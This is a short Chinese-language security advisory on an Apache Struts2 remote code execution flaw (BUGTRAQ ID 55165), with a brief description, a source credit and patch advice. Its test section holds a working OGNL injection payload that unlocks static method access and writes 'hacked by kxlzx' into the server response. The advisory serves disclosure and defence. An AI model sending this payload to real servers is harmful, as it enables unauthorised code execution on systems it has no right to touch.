漏洞版本:
Apache Group Struts2
漏洞描述:
BUGTRAQ ID: 55165 Apache Struts是一款开发Java Web应用程序的开源Web应用框架。 Apache Struts在实现上存在安全漏洞,攻击者可利用此漏洞在网络服务器进程中运行上传的脚本代码,导致非法访问或权限提升。
<* 参考
kxlzx
http://inbreak.net/
*>
测试方法:
本站提供程序(方法)可能带有攻击性,仅供安全研究与教学之用,风险自负!
- %{(#_memberAccess[‘allowStaticMethodAccess’]=true)(#context[‘xwork.MethodAccessor.denyMethodExecution’]=false)(#hackedbykxlzx=@org.apache.struts2.ServletActionContext@getResponse().getWriter(),#hackedbykxlzx.println(‘hacked by kxlzx’),#hackedbykxlzx.close())}
安全建议:
厂商补丁: Apache Group ------------ 目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本: http://httpd.apache.org/
评论关闭。